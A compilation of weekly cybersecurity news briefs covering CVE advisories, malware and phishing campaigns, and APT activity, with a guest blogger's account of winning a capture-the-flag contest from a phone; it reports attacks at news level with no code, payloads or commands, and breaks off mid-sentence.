info ⇾ * * * PoC of polymorphic malware using Artificial Intelligence Researchers at Hyas have built a proof-of-concept for polymorphic malware generation using an Artificial Intelligence language model. The software created, which they have named BlackMamba, is a polymorphic keylogger with the ability to modify its code during execution, and without the use of Command & Control (C2) infrastructures. BlackMamba uses a benign executable to communicate with the OpenAI API during execution, which provides it with the malicious code necessary to collect the user's keystrokes. Whenever the malware executes, this capability is re-synthesised, allowing it to evade security solutions. According to the researchers, their analysis with a well-known EDR solution yielded no detection of the malware. The exfiltration of the data collected by the malware in this test is done via Microsoft Teams, which it accesses with the stolen credentials. More info ⇾

Vulnerabilities in WordPress Houzez A security researcher from Patchstack has recently discovered two critical vulnerabilities in Houzez, a WordPress theme and plugin that allows easy and seamless list management for the client. The first vulnerability, identified as CVE-2023-26540 and CVSS of 9.8, refers to a configuration bug affecting version 2.7.1 and earlier, and can be exploited remotely without authentication to escalate privileges. On the other hand, the flaw identified as CVE-2023-26009 and CVSS 9.8, affects Houzez login in versions 2.6.3 and earlier. In the attacks observed by Patchstack, the threat actors distributed a backdoor capable of executing commands, injecting ads into the website and redirecting to malicious sites, so researchers recommend updating as soon as possible. More info → * * * Digital Smoke: global investment fraud scam The Resecurity team has identified an investment fraud ring, which is said to have operated from 2015 to early 2023. The malicious actors behind this network, which has been named "Digital Smoke", operated by impersonating globally known corporations, such as Verizon, BackRock, Ferrari, Shell, Barclays, among others, in order to get victims, located globally, to invest in fake investment products. Digital Smoke developed a large network of web resources and mobile applications hosted by different hosting providers and jurisdictions. The modus operandi consisted of registering domains similar to the legitimate domains of the spoofed companies, placing the links to register new victims on messaging applications such as WhatsApp and other social networks. Once victims registered on the website or application created by the malicious actors, they were asked to make a payment for the alleged investment. It should be noted that investigators shared all available information with the Indian Cybercrime Coordination Centre and US authorities in late 2022, with the operation being discontinued in early 2023. More info → * * * Aruba fixes six critical vulnerabilities Aruba has issued a security advisory reporting six critical vulnerabilities affecting several versions of ArubaOS. The affected products are Aruba Mobility Conductor, Aruba Mobility Controllers and WLAN Gateways and SD-WAN Gateways. The vulnerabilities identified as CVE-2023-22747, CVE-2023-22748, CVE-2023-22749 and CVE-2023-22750, all with CVSSv3 9.8 derive from a command injection flaw. Vulnerabilities CVE-2023-22751 and CVE-2023-22752 also both with CVSSv3 9.8, are buffer overflow bugs. These vulnerabilities can be exploited by an unauthenticated attacker to send packets to the PAPI (Aruba Access Point Management Protocol) through UDP port 8211, allowing arbitrary code execution as privileged users on ArubaOS. More info → * * * APT-C-36: new malicious campaign against Ecuador and Colombia BlackBerry researchers have published research uncovering a new campaign by APT-C-36, also known as BlindEagle, against geolocated targets in Ecuador and Colombia. In this campaign, malicious actors impersonated Colombia's National Tax and Customs Directorate and Ecuador's Internal Revenue Service in order to launch phishing campaigns targeting key industries in both countries, including the health, financial and governmental sectors. This information follows another discovery in January by Check Point, which warned of a campaign by the same actor, which they claimed to be interested in monetary gain. However, BlackBerry has indicated that during the most recent incidents the objectives were to steal information and spy on its victims. More info → * * * Cryptojacking campaign against Redis databases Researchers at Cado Labs have discovered a cryptojacking campaign targeting miscondivd Redis database servers. The campaign is conducted via transfer.sh, an open source file transfer service that has been breached since 2014. The access vector takes place by exploiting an insecure Redis implementation, saving the database in a cron directory that leads to the execution of arbitrary commands. Since the malware's main goal is to mine cryptocurrencies with XMRig, it carries out a number of measures to ensure its effectiveness. Among these, it frees up system memory, removes any cryptominers and installs a network scanner to find other vulnerable Redis servers and spread the infection. More info →

Fortinet fixes critical vulnerabilities in FortiNAC and FortiWeb Fortinet has issued a security advisory fixing two critical vulnerabilities affecting its FortiNAC and FortiWeb products. The security flaws have been registered as CVE-2022-39952, with a CVSSv3 of 9.8, which affects FortiNAC and could allow an unauthenticated attacker to execute unauthorised code or commands via a specially crafted HTTP request. The other vulnerability, identified as CVE-2021-42756, has a CVSSv3 of 9.3, affects FortiWeb and its exploitation could allow an unauthenticated remote attacker to perform arbitrary code execution via specially crafted HTTP requests. Fortinet recommends that affected users upgrade FortiNAC to versions 9.4.1, 9.2.6, 9.1.8, and 7.2.0 on the one hand, and upgrade FortiWeb to 7.0.0, 6.3.17, 6.2.7, 6.1.3, and 6.0.8 or later on the other hand. More info → * * * Access credentials of two major data centre operators exposed The Resecurity team has published an investigation into the sale of login credentials of two data centre operators in Asia, namely GDS Holdings Ltd. (China) and ST Telemedia Global Data Centres (Singapore). The security incidents, which have yet to be clarified, took place in 2021, but only became public knowledge on 20 February, when the stolen data was published on an underground forum. Among the exfiltrated data are credentials, emails, phone numbers or ID card references, with an estimated compromise of more than 3,000 records in total. Indirectly, large global corporations that used these data centres have also been compromised, with logins of companies such as Apple, BMW, Amazon, Walmart, Alibaba, Microsoft and Ford Motor, among others, being exposed. It should be noted that both data centres forced their customers to change their passwords last January, although Resecurity has confirmed several attempts to access different customer portals. Finally, it should be noted that researchers have also been unable to attribute these attacks to any particular group. More info → * * * Fake ChatGPT applications used to distribute malware Kaspersky researchers are warning of a fake Windows desktop version of ChatGPT being used to distribute malware. The authors of this campaign, taking advantage of the growing popularity of the OpenAI chatbot, are reportedly using social media accounts to advertise the platform and include a link to the supposed download site. Some of the profiles identified by Kaspersky also offered trial accounts to increase the interest of potential victims. Once the download is complete, an error message is displayed warning of a problem with the installation, while in reality a Trojan with infostealer capabilities has been downloaded and named "Fobo". Cyble's intelligence team has also investigated the same campaign distributing other malware families such as the Lumma and Aurora stealers. Security researcher Dominic Alvieri has also published about other cases of campaigns distributing the RedLine stealer. More info → * * * Vulnerabilities in VMware products VMware has issued two security advisories warning of two critical vulnerabilities affecting several of the company's products: The most critical security flaw has been reported as CVE-2023-20858, with a CVSSv3 of 9.1 according to the vendor, which affects Carbon Black App Control. Exploiting this vulnerability could allow a malicious actor to use a specially crafted entry in the App Control management console to gain access to the server's operating system. Another vulnerability has been published as CVE-2023-20855, with a CVSSv3 of 8.8 according to the vendor, which impacts vRealize Orchestrator, vRealize Automation and Cloud Foundation products. In this case, a malicious actor could use specially crafted entries to bypass XML parsing restrictions that terminate access to sensitive information or allow privilege escalation on affected systems. More info → * * * Phishing campaign via PayPal Avanan researchers have reported a new phishing campaign sent from the PayPal platform. The malicious actors are taking advantage of the ease of creating free PayPal accounts, which offer the ability to create and send invoices to multiple recipients at once. In this way, the messages received by the victims come directly from the PayPal domain, circumventing possible security detections. In the detected campaign, several messages have been observed in which victims are told that their account has been debited, and that in case it has not been authorised, they should call a telephone number. This phone number is not associated with PayPal, and by calling it the attackers get the victims' phone number and other personal details, which can be used in future attacks. Due to the difficulty of implementing security measures to block these emails, researchers recommend searching for the phone number on the Internet in order to see whether or not it is related to PayPal. More info →

Apple fixes actively exploited 0-day Apple has issued several security advisories to fix an actively exploited 0-day vulnerability. The security flaw, listed as CVE-2023-23529, is a type confusion in the browser's WebKit that could be used by a would-be attacker to execute arbitrary code on vulnerable devices after opening a malicious web page crafted for such purposes. This flaw affects both older and newer devices, being fixed in iOS 16.3.1 and iPadOS 16.3.1, macOS Ventura 13.2.1, and Safari 16.3.1. On the other hand, Apple has also fixed a vulnerability in the kernel that allows remote code execution, registered as CVE-2023-23514, which affected macOS Ventura devices and several iPhone and iPad models. Lastly, a vulnerability that could allow access to unprotected user data affecting macOS Ventura has been identified as CVE-2023-23522. More info → * * * Microsoft fixes 75 vulnerabilities in its Patch Tuesday including 3 0-days Microsoft has patched 75 vulnerabilities in various products including Microsoft Windows, Office, Exchange and Azure in its latest security update. Nine of these vulnerabilities are reported to have received a critical severity score, and 66 others are reported to have been rated as "important". Three of these security bugs would be 0-day actively exploited: CVE-2023-21823, a remote code execution vulnerability in Windows Graphics Component with a CVSSv3 score of 7.8; CVE-2023-21715, a security feature bypass vulnerability in Microsoft Publisher with a CVSSv3 score of 7.3 and CVE-2023-23376, a privilege escalation vulnerability in Windows Common Log File System Driver with a CVSSv3 score of 7.8. More info → * * * Cyber-attack against several NATO websites A NATO official confirmed to the DPA news agency that the organisation was investigating a cyber-attack on several NATO websites. The attack took place on Sunday night and disabled several NATO websites, including that of the NATO Special Operations Headquarters. The attack was allegedly a politically motivated hacktivist action in favour of one of the parties in the current conflict, as a Telegram channel of a hacktivist group posted a message asking for help from fellow hackers to attack all NATO units. Other hacktivist channels also posted evidence of inoperable NATO assets such as the Military Command website and the Joint Military Centre website, among others. More info → * * * Mozilla issues security updates for Firefox 110 and Firefox ESR Mozilla has issued two security alerts regarding vulnerability fixes in Firefox110 and FirefoxESR. Most of these vulnerabilities, still pending CVSS classification, have been categorised by the vendor as high impact. Their exploitation could lead an attacker to perform spoofing attacks; access confidential information, including NTLM credentials; evade security mechanisms or execute arbitrary code, among other behaviours. The vendor recommends upgrading to the latest version of Firefox 110 and Firefox ESR 102.8. The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a notification informing of these updates and requesting users and administrators to implement the necessary measures. More info → * * * Vulnerabilities in Schneider Electric PLC models Forescout's team of Vedere Labs researchers has published an analysis of two critical vulnerabilities affecting several Schneider Electric PLC models. These security flaws are the one registered as CVE-2022-45789, with a CVSSv3 9.8, which allows an authentication bypass that could cause the execution of unauthorised Modbus functions on the controller by hijacking an authenticated Modbus session. In addition, the vulnerability registered as CVE-2022-45788, which has also been assigned a CVSSv3 of 9.8, could be exploited for remote code execution, cause a denial of service attack and could result in loss of confidentiality and data integrity when executing undocumented Modbus UMAS CSA commands. Researchers indicate that malicious actors could chain exploit them to achieve lateral movement in the victim's network. The affected versions include all versions of EcoStruxure Control Expert and Modicon Unity PLC, as well as EcoStruxure Process Expert version V2020. More info → Featured photo: Ed Hardie / Unsplash

Critical vulnerability in Atlassian Jira Atlassian has issued a security advisory in which it releases fixes to resolve a critical vulnerability in Jira Service Management Server and Data Center. According to the vendor, this security flaw has been registered as CVE-2023-22501, CVSSv3 of 9.4, and has been classified as a low attack complexity because a malicious actor could gain access to registration tokens sent to users with accounts that have never been logged in. This could lead to a user impersonation that would allow unauthorised access to critical instances of Jira Service Management. Atlassian says the security issue affects versions 5.3.0 to 5.5.0, and advises upgrading to versions 5.3.3, 5.4.2, 5.5.1 and 5.6.0 or later. In case the patches cannot be applied as soon as possible, the manufacturer has provided a workaround to manually update the asset. More info ⇾ * * * Mustang Panda campaign to distribute PlugX Researchers at EclecticIQ have detected the existence of a PlugX malware distribution campaign and attribute it to the APT Mustang Panda. According to the published information, Mustang Panda sent out EU-themed emails containing a supposed Word file that was in fact an LNK-like executable that downloads PlugX onto the victim's system. EclecticIQ claims that the target of the campaign is European governmental institutions and recalls that a similar campaign was attributed to the same actor last October, although in the recently detected campaign Mustang Panda has implemented more evasion techniques to avoid detection. More info ⇾ * * * Tor and I2P networks hit by DDoS attacks Tor and peer-to-peer (I2P) networks have recently been hit by distributed denial-of-service (DDoS) attacks that have caused connectivity and performance problems. On the one hand, Isabela Dias Fernandes, executive director of the Tor Project, issued a statement saying that the network had been under DDoS attacks since July. The target of these ongoing attacks or the identity of the threat actor behind these events has not been detailed. The company has stated that it is continuing to work to improve its defences so that users are not affected. The I2P network has also been the victim of an attack of this type over the last three days, causing performance and connectivity problems According to the project administrator's statements, as in the case of Tor, the threat actors behind these attacks are using a variety of tactics to perpetrate these DDoS attacks. More info ⇾ * * * New Google Chrome update Google has released a new version of Chrome 110 which fixes a total of 15 vulnerabilities, 10 of which have been identified by security researchers outside the company. The breakdown of these vulnerabilities according to their criticality is as follows: 3 with high criticality, 5 medium and 2 low. Among these, the three with the highest severity are those identified as: firstly CVE-2023-0696, which could allow a remote attacker to exploit it through a specially crafted HTML page. In second place, CVE-2023-0697 affecting Chrome for Android, which could allow a remote attacker to use a manipulated HTML page to spoof the content of the security user interface. Lastly, CVE-2023-0698 which would allow a remote attacker to perform an out-of-bounds memory read via a malicious HTML page. It is recommended to update to Chrome versions 110.0.5481.77/.78 for Windows and 110.0.5481.77 for Mac and Linux to fix these vulnerabilities. More info ⇾

We organised activities aimed at the technical audience in the Hacking Village area as part of our participation in the Barcelona Security Congress 2023 event. One of the activities consisted of a Capture the Flag challenge in which 74 hackers registered, including both on-site and online participants. David Soto, our guest blogger, was the first participant to solve three challenges, win the challenge and win the prize. In this post he tells us how he managed to do it using only his mobile phone, and what are the keys to stay ahead in the field of cybersecurity. * * * BY DAVID SOTO CYBER SECURITY SPECIALIST I am David Soto and I am lucky enough to work as an IT consultant as a cybersecurity and secure development specialist at ERNI Consulting Spain. I have been passionate about this field since I was a child. In Capture the Flag (CTF) competitions I am known by the alias of JDarkness and I have the honour of having won competitions such as IntelCon, MundoHacker or PwnVerse, among others. And more recently, just a few days ago, the one organised by Telefónica Tech together with campus 42 during the celebration of the Barcelona Cybersecurity Congress. Capture The Flag are free competitive games that test your knowledge and skills as a hacker. Participants find themselves in different types of challenges with the objective of getting a "flag", a code that proves that you have solved the challenge. On this occasion, since I won the challenge in a somewhat "different" way, using only my mobile phone, I have been invited to write this post telling how the competition went and my experience. So here is my story: A couple of weeks ago, while looking at the schedule of the Barcelona Cybersecurity Congress, I found out that this year they had prepared a hybrid Capture the Flag challenge, with online and on-site modalities. As I was planning to go to the congress, I signed up with the intention of seeing what challenges they had prepared, sitting down for a while with my laptop and see how far I could go. Humbert in the Hacking Village space at Barcelona Cybersecurity Congress Once I received the admission tickets, I started to prepare my itinerary: Tour with the DCA, visits to the exhibitors of interest... I set aside 30 minutes to sit in the Hacking Village and watch the challenges without much intention of winning. When the DCA Tour was over, I headed to the Hacking Village to log on to my laptop and take on the challenges. However, just at that moment, a presentation had started and there was not a single free seat left. As I needed to connect my laptop, I thought: "Well, I'll take my chances, as I just want to see what the challenges are about, I'll watch it on my phone". So, I went to visit the stands. I have to say that on my phone I carry a termux with a small Kali Linux distribution, which, although uncomfortable, allows me to carry out small tests and tasks in case I need to do so. CYBER SECURITY Name the malware you have, and I'll tell you which botnet you belong to September 15, 2022 How the Capture the Flag challenge went, step-by-step In this CTF, co-organised by Fundación Telefónica with the 42 programming campus, participants were challenged to three cybersecurity challenges plus an extra one to test their skills in memory analysis, use of cookies, password cracking... To win they had to solve at least three of the four challenges of warm-up, steganography, forensics and web. 1. Warm-up challenge The warm-up challenge was to find a text string within the main page and pass it as a flag. Easy, I moved on to the next one. 2. Steganography challenge It is a type of challenge based on hiding information inside files or images that do not appear to be hidden. Participants must discover where the information is hidden and extract it. After the warm-up, the steganography challenge was the first "real" challenge. It consisted of a login screen with a nice Telefónica Tech logo... 3. Forensic challenge A forensic challenge involves analysing files and systems in order to recover information (such as encrypted or deleted data), identify intruders, attackers or the perpetrators of computer crimes. In this case it was a couple of supposedly dumped memory files or disk images... Having neither a keyboard nor the right applications, I didn't even consider solving the challenge at the time, but I could always come back later if needed. Martina Matarí, Head of Offensive Security Services at Telefónica Tech, during her speech. 4. Web challenge Given the above, I decided to go for the last one, the web challenge. They usually include the identification and exploitation of vulnerabilities in websites, the recovery of sensitive information or the analysis of network packets. Perhaps the most accessible without tools. The web challenge also started with a login screen asking for a username and password. I applied a SQL injection that worked its magic and returned a list of users and encrypted passwords. The challenge statement mentioned a control panel. I found it but it had SQLi protection, so I couldn't do a SQL injection. But as I had the previous credentials I could log in without any problem. Now yes, and the exercise was completed. Cyber Security How Lokibot, the malware used by Machete to steal information and login credentials, works June 29, 2022 The keys: knowledge, methodologies and tolos At this point three challenges already had a solution, so I went to have lunch with my colleagues and forgot about the competition. To my surprise I received an email inviting me to collect the prize for the highest score in person! I went to collect the prize and the story of how I had won using my phone made a big impact. The fact that I solved these challenges on the phone is thanks to having clear methodologies. In this sense, I had the pleasure of learning from the great Francisco Martín, who always insisted on two things: Fat-button tools are only used when you know what they do and you are able to manage without them. Fuzzing is your friend: fuzz everything. Jokes aside, I think understanding what we do, how we do it and why we do it is essential for those of us in IT. So I would like to take this opportunity to encourage future professionals to learn, to investigate and not to remain on the surface of what we are taught. Because, who knows, maybe that will allow you to achieve things that nobody expects you to achieve..

LockBit Green: new LockBit variant Researchers at vx-underground have recently detected that a new ransomware variant, called LockBit Green, is being used by the LockBit ransomware handlers. This new variant would be the third one used by the group, after its inception with Lockbit Red, and its subsequent evolution to LockBit Black (also called LockBit 3.0). Several researchers have analysed the available samples of LockBit Green and found that this new variant is based on Conti's source code. Based on their analysis, they note that the ransom note used is that of LockBit 3.0, and that the .lockbit extension is no longer used, but a random one, when encrypting files on the victim's system. The PRODAFT team has also shared Indicators of Compromise (IoCs) and a Yara rule for the new variant. More info → * * * GitHub revokes compromised Desktop and Atom certificates Github has taken the decision to revoke a number of certificates used for its Desktop and Atom applications after they were compromised in a security incident in December. According to the company itself, the unauthorised access in December did not affect the platform's services, however, a group of certificates were exfiltrated as a result. These certificates are password-protected, and so far, no malicious use of them has been detected. The removal of these certificates will invalidate GitHub Desktop for Mac versions 3.0.2 to 3.1.2 and Atom versions 1.63.0 to 1.63.1. Users of these versions are advised to upgrade to the latest version in the case of Desktop and revert to earlier versions in the case of Atom. The changes will take effect on 2 February. More info → * * * PoC available for KeePass vulnerability KeePass has recently discovered a vulnerability in its software for which a PoC has already been released. The flaw, identified as CVE-2023-24055, allows threat actors with write access to a system to alter the XML configuration file and inject malware to export the database with users and passwords in plain text. When a user accesses KeePass and enters the master password to open the database, the export rule is triggered in the background and the content is saved in a file that is accessible to attackers. While KeePass described the issue in 2019 without describing it as a vulnerability, users are requesting that the product include a confirmation message before exporting or being able to disable the feature. Bleeping Computer recommends ensuring that unprivileged users do not have access to any application files and creating a configuration file. More info → * * * Two new vulnerabilities in CISCO devices Researchers at Trellix have warned of two vulnerabilities in Cisco devices. The first, identified as CVE-2023-20076 and with a manufacturer's CVSS of 7.2, would allow an unauthenticated attacker to remotely inject commands into various devices. The second bug, so far identified with Cisco bug ID CSCwc67015, would allow an attacker to remotely execute code and overwrite existing files. While both bugs were originally identified in Cisco ISR 4431 routers, they would affect other devices as well: 800 Series Industrial ISRs, CGR1000 Compute Modules, IC3000 Industrial Compute Gateways, IOS-XE-based devices condivd with IOx; IR510 WPAN Industrial routers and Cisco Catalyst Access points (COS-APs). Cisco has reportedly released security updates for the first vulnerability mentioned, and researchers urge affected organisations to upgrade to the latest firmware version available, and to disable the IOx framework if it is not needed. More info → * * * Lazarus campaign against energy and healthcare companies WithSecure has published extensive research on the latest campaign by the APT Lazarus, allegedly backed by North Korea. The campaign has been named "No Pineapple!" and in it the group has managed to steal 100GB of data from medical research, engineering and energy companies, among others. According to WithSecure, Lazarus exploited vulnerabilities CVE-2022-27925 and CVE-2022-37042 in Zimbra to place a webshell on the victims' mail server. Once inside the system they used various tools such as the Dtrack backdoor and a new version of the GREASE malware, which abuses the PrintNightmare vulnerability. WithSecure was able to attribute the campaign to Lazarus, in addition to repeating TTPs associated with the group, because it discovered that the webshells communicated with an IP located in North Korea. More info → Featured photo: Brecht Corbeel / Unsplash

Killnet targeting victims in Spain This week, the hacktivist group Killnet announced a campaign of attacks against Germany, leading to Distributed Denial of Service (DDoS) attacks that rendered the websites of the German government, the Bundestag, several banks and airports in the country inoperative on Wednesday. Following these attacks, the group posted a comment on its Telegram channel directly pointing to Spain as a possible target for its next attacks, leaving the following message "Spain – f*** you too, but with you everything will be easier and faster". Following this message, other participants within the Telegram channel explicitly singled out two Spanish companies, stating that they would be supposedly "easy" to attack. No attacks against Spanish critical infrastructure companies or government agencies have been reported so far. * * * Apple fixes 0-day vulnerability affecting older iPhones and iPads Apple has issued a security advisory addressing patches for an actively exploited 0-day vulnerability in older iPhones and iPads. The vulnerability, listed as CVE-2022-42856 with a CVSSv3 of 8.8, could allow an attacker to process maliciously crafted web content to achieve arbitrary code execution, due to a type confusion in Apple's WebKit web browser engine. This vulnerability was published in December for other Apple products, and is now available for older versions, specifically the iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). Apple's advisory states that there is evidence of active exploitation of this vulnerability in iOS versions prior to iOS 15.1. Also, on 14 December, CISA included this vulnerability in its catalogue of exploited vulnerabilities. More info → * * * VMware vulnerabilities fixed VMware has released security patches to address a number of vulnerabilities in vRealize Log Insight, now known as VMware Aria Operations for Logs. The first vulnerability, identified as CVE-2022-31703 and CVSS 7.5, addresses a directory traversal flaw whereby attackers can inject files into the affected system and achieve remote code execution. On the other hand, CVE-2022-31704, with CVSS 9.8, is an access control vulnerability that can be exploited for remote code execution. The company has also fixed a deserialisation vulnerability, identified as CVE-2022-31710 and CVSS 7.5, which can trigger a DoS, and CVE-2022-31711, with CVSS 5.3, which addresses an information disclosure flaw. More info → * * * PY#RATION: a new Python-based RAT The Securonix research team has discovered a new Python-based malware attack campaign with Remote Access Trojan (RAT) capabilities. This malware, named PY#RATION, is actively evolving, having moved from version 1.0 to 1.6.0 since its detection in August 2022. PY#RATION is distributed via phishing containing .ZIP attachments, inside which there are two .lnk shortcut files in the guise of images (front.jpg.lnk and back.jpg.lnk). When these shortcuts are executed, the victim sees the image of a British driving licence on the front and back, but also executes the malicious code to contact the C2, which in turn downloads two additional files to the user's temporary directory. Once executed, PY#RATION is able to perform network enumeration, perform file transfers, keylogging, steal data from the clipboard, extract passwords and cookies from web browsers or execute shell commands, among other capabilities. According to Securonix, this campaign is mainly targeted at victims in the UK or North America. More info → * * * Microsoft plans to block XLL files from the Internet After disabling macros in Office files downloaded from the Internet to prevent the spread of malware, Microsoft's next step in its fight against malicious files will be to block XLL files coming from the Internet, mainly attached to e-mails. XLL files are dynamic Excel libraries that provide additional features to Excel (dialogue boxes, toolbars, etc.). Since these are executable files, they are very useful for threat actors who include them in their phishing campaigns to download malware onto the victim's computer with a single click. According to Microsoft, the measure is being rolled out and will be generally available to users in March. More info → Featured photo: Arnel Hasanovic / Unsplash

Critical vulnerabilities in Netcomm and TP-Link routers Several vulnerabilities have been discovered in Netcomm and TP-Link routers. On the one hand, the flaws, identified asCVE-2022-4873 and CVE-2022-4874, are a case of buffer overflow and authentication bypass that would allow remote code execution. The researcher who discovered them, Brendan Scarvell, has published a PoC for both. The affected router models are Netcomm NF20MESH, NF20 and NL1902 running firmware versions prior to R6B035. On the other hand, the CERT/CC detailed two vulnerabilities affecting the TP-Link WR710N-V1-151022 and Archer-C5-V2-160201 routers, which could cause information disclosure (CVE-2022-4499) and remote code execution (CVE-2022-4498). More info → * * * PoC for multiple vulnerabilities in Wordpress plugins Researchers at Tenable have published details of three new vulnerabilities in plugins for the Wordpress platform, including proof-of-concepts (PoCs) for all of them. The first, catalogued as CVE-2023-23488 with a CVSS score of 9.8, is a SQL injection vulnerability without authentication in the Paid Membership Pro plugin. The second, identified as CVE-2023-23489 with the same score and of the same type as the previous one, affects the Easy Digital Downloads plugin. And the third and last, CVE-2023-23490 with a CVSS score of 8.8 and also a SQL injection vulnerability, affects the Survey Maker plugin. The authors of the plugins would have been notified in December 2022 and would have released security updates correcting these issues, so that the latest available versions would no longer be vulnerable. More info ⇾ * * * Hook: new banking trojan targeting Android devices Researchers at ThreatFabric have discovered a new Android banking trojan called Hook. According to the researchers, it was reportedly released by the same developer as the Android banking trojan Ermac, although it has more capabilities than its predecessor. ThreatFabric claims that Hook shares much of its source code with Ermac, so it should also be considered a banking trojan. The most notable aspect of Hook is that it includes a VNC (virtual network computing) module that allows it to take control of the compromised interface in real time. It is worth noting that Spain is the country with the second highest number of banking applications threatened by Hook after the United States, according to the ThreatFabric report. More info → * * * Malware discovered hidden in PyPI repository packages Fortinet researchers have discovered three packages in the PyPI (Python Package Index) repository containing malicious code intended to infect developers' systems with infostealer-type malware. The three packages, which have been uploaded to the platform by the same user with the nickname Lolip0p, are called Colorslib, httpslib and libhttps, respectively. Fortinet highlights that as a major novelty in this type of supply chain attack, the threat actor has not tried to embed malware in malicious copies of legitimate packages, but has instead created its own projects by investing a lot of effort in making them look trustworthy. Fortinet found that the setup file for all three packages is identical and attempts to run a PowerShell that downloads a malicious file. According to PyPI's statistics, together these three packages have been downloaded 549 times so far. More info → * * * NortonLifeLock reports password manager incident Gen Digital, the company that owns NortonLifeLock, has begun sending a statement to an undisclosed number of its users informing them that an unauthorised third party has been able to access their Norton Password Manager accounts and exfiltrate first names, last names, phone numbers and email addresses. In the official notification sent to the Vermont Attorney General's Office, Norton explains that its systems have not been compromised or abused, and that the incident is due to the attacker reusing usernames and passwords available in a database for sale on the dark web. This claim is supported by the fact that in late December Norton detected a substantial and unusual increase in the number of failed login attempts on its systems, indicating that attackers were trying to gain access by testing compromised passwords on another service. The incident again highlights the need for a proper password policy with unique passwords for each online service. More info → Featured photo: Souvik Banerjee / Unsplash

Microsoft fixes 98 vulnerabilities on Patch Tuesday Microsoft has published its security bulletin for the month of January, in which it fixes a total of 98 vulnerabilities. Among these, an actively exploited 0-day vulnerability stands out, which has been identified as CVE-2023-21674 with a CVSSv3 of 8.8. It is an Advanced Local Procedure Call (ALPC) privilege escalation vulnerability in Windows, which could lead a potential attacker to obtain SYSTEM privileges. Also noteworthy is the vulnerability CVE-2023-21549 (CVSSv3 8.8) for escalation of privileges of the Windows SMB Witness service. Its exploitation by a potential attacker could lead to the execution of RPC functions that are restricted only to privileged accounts, as it has already been publicly disclosed. It should also be noted that of the 98 vulnerabilities fixed, eleven of them have been classified by Microsoft as critical, specifically those identified as: CVE-2023-21743, CVE-2023-21743, CVE-2023-21561, CVE-2023-21730, CVE-2023-21556, CVE-2023-21555, CVE-2023-21543, CVE-2023-21546, CVE-2023-21679, CVE-2023-21548, and CVE-2023-21535. More info → * * * Critical vulnerability in unsupported Cisco routers Cisco has issued a security advisory warning of a critical vulnerability affecting multiple end-of-life Cisco routers for which there is a public PoC, although there is currently no known exploit attempts. This security flaw, registered as CVE-2023-20025, with a CVSSv3 of 9.0 according to the vendor, can trigger an authentication bypass caused by incorrect validation of user input within incoming HTTP packets. Unauthenticated malicious actors could remotely exploit it by sending a specially crafted HTTP request to the administration interface of vulnerable devices. This security flaw could also be chained together with another new vulnerability, CVE-2023-20026, which would allow arbitrary code execution. Finally, it should be noted that the affected devices are Cisco Small Business router models RV016, RV042, RV042G and RV082. Cisco says it will not release a patch, but as a mitigating measure it is recommended to disable the administration interface and block access to ports 443 and 60443 to block exploitation attempts. More info → * * * IcedID takes less than 24 hours to compromise the Active Directory Researchers at Cybereason have published an analysis of the banking trojan IcedID, also known as BokBot, highlighting how quickly it can compromise a victim's system. In the report Cybereason warns that IcedID takes less than an hour from initial infection to start lateral movements in the system and that it takes less than 24 hours to compromise the Active Directory and finally start data exfiltration in just 48 hours. The report also highlights that IcedID has changed its initial access vector as it was initially distributed via Office files with malicious macros, but after the macro protection measures implemented by Microsoft it is now distributed via ISO and LNK files. Finally, it is worth noting that IcedID shares tactics, techniques and procedures (TTPs) with groups such as Conti and Lockbit. More info → * * * Vulnerability actively exploited in Control Web Panel (CWP) Shadowserver Foundation and GreyNoise have detected active exploitation of the critical vulnerability in Control Web Panel (CWP) listed as CVE-2022-44877 with a CVSSv3 of 9.8. The vulnerability, which was discovered by researcher Numan Türle, was patched in October, but it was not until last week that more details of the vulnerability were published along with a Proof of Concept (PoC). According to the experts, the first attempts to exploit this vulnerability, which would allow an unauthenticated threat actor to perform remote code execution on vulnerable servers or privilege escalation, were detected on 6 January. Specifically, this security flaw affects CWP7 versions prior to 0.9.8.1147. It is worth noting that GreyNoise has observed four unique IP addresses attempting to exploit this vulnerability. More info → * * * Latest SpyNote version targets banking customers Researchers at ThreatFabric have reported recent activity in the SpyNote malware family, also known as SpyMax. The latest known variant has been listed as SpyNote.C, which was sold by its developer via Telegram, under the name CypherRat, between August 2021 and October 2022, accumulating, according to researchers, a total of 80 customers. However, in October 2022, the source code was shared on GitHub, which led to a very significant increase in the number of detected samples of this malware. Among these latest samples, it has been observed how SpyNote.C has targeted banking applications, impersonating apps from banks such as HSBC, Deutsche Bank, Kotak Bank, or BurlaNubank, as well as other well-known applications such as Facebook, Google Play, or WhatsApp. It is noteworthy that SpyNote.C combines spyware and banking Trojan capabilities, being able to use the API of the devices' camera to record and send videos to its C2, obtain GPS and network location information, steal social network credentials, or exfiltrate banking credentials, among other capabilities. More info →

PyTorch's dependency chain is breached PyTorch, a popular open-source machine learning framework, has warned users who installed PyTorch-nightly between 25 and 30 December 2022 to uninstall the framework and the 'torchtriton' library due to a successful compromise via a dependency confusion attack. The malicious 'torchtriton' library in PyPI shares a name with an official library published in the PyTorch-nightly repository, causing the malicious package to be introduced to users' systems instead of the legitimate one in order to steal sensitive information from the victim. PyTorch has renamed the 'torchtriton' library to 'pytorch-triton' and reserved a dummy package in PyPI to prevent similar attacks. This issue does not affect users of the stable versions of PyTorch. More info → * * * Synology fixes a critical vulnerability Synology has addressed a maximum severity vulnerability affecting Plus Servers VPN. The vulnerability, identified as CVE-2022-43931 and CVSS of 10.0, can be exploited in low-complexity attacks without requiring router privileges or user interaction, allowing a remote attacker to execute arbitrary commands. The company has released fixes for the vulnerabilities and recommends users upgrade VPN Server Plus for SRM to the latest version. More info → * * * New Raspberry Robin campaign Security Joes researchers have detected new attacks by the Raspberry Robin framework against insurance and financial institutes in Europe. Raspberry Robin activity was also recently documented by the TrendMicro team, but Security Joes researchers have observed a new, more complex version of the malware. The download mechanism has been updated with new anti-analysis capabilities. The attackers have also started to collect more data from victims' machines. Regarding this last issue, they point out that, while previously the C2 beacon contained a URL with username and hostname in plain text, it now contains other data such as the name of the processor and additional data on the video devices available on the machine, while encrypting this profile of the victim's machines with RC4. Finally, it is worth noting that this time the victims are Portuguese and Spanish-speaking organisations. More info → * * * MasquerAds: malware distribution campaign using Google Ads Researchers at Guardio have warned of a malware distribution campaign via Google Ads which they have named MasquerAds. The ads, supposedly promoting popular legitimate programs such as Zoom, Slack, AnyDesk, Blender, Audacity or Brave, point to a legitimate website approved by Google's ad system, however, once the link is accessed, the user is redirected to a different site where the malware is eventually downloaded and hosted on legitimate services such as 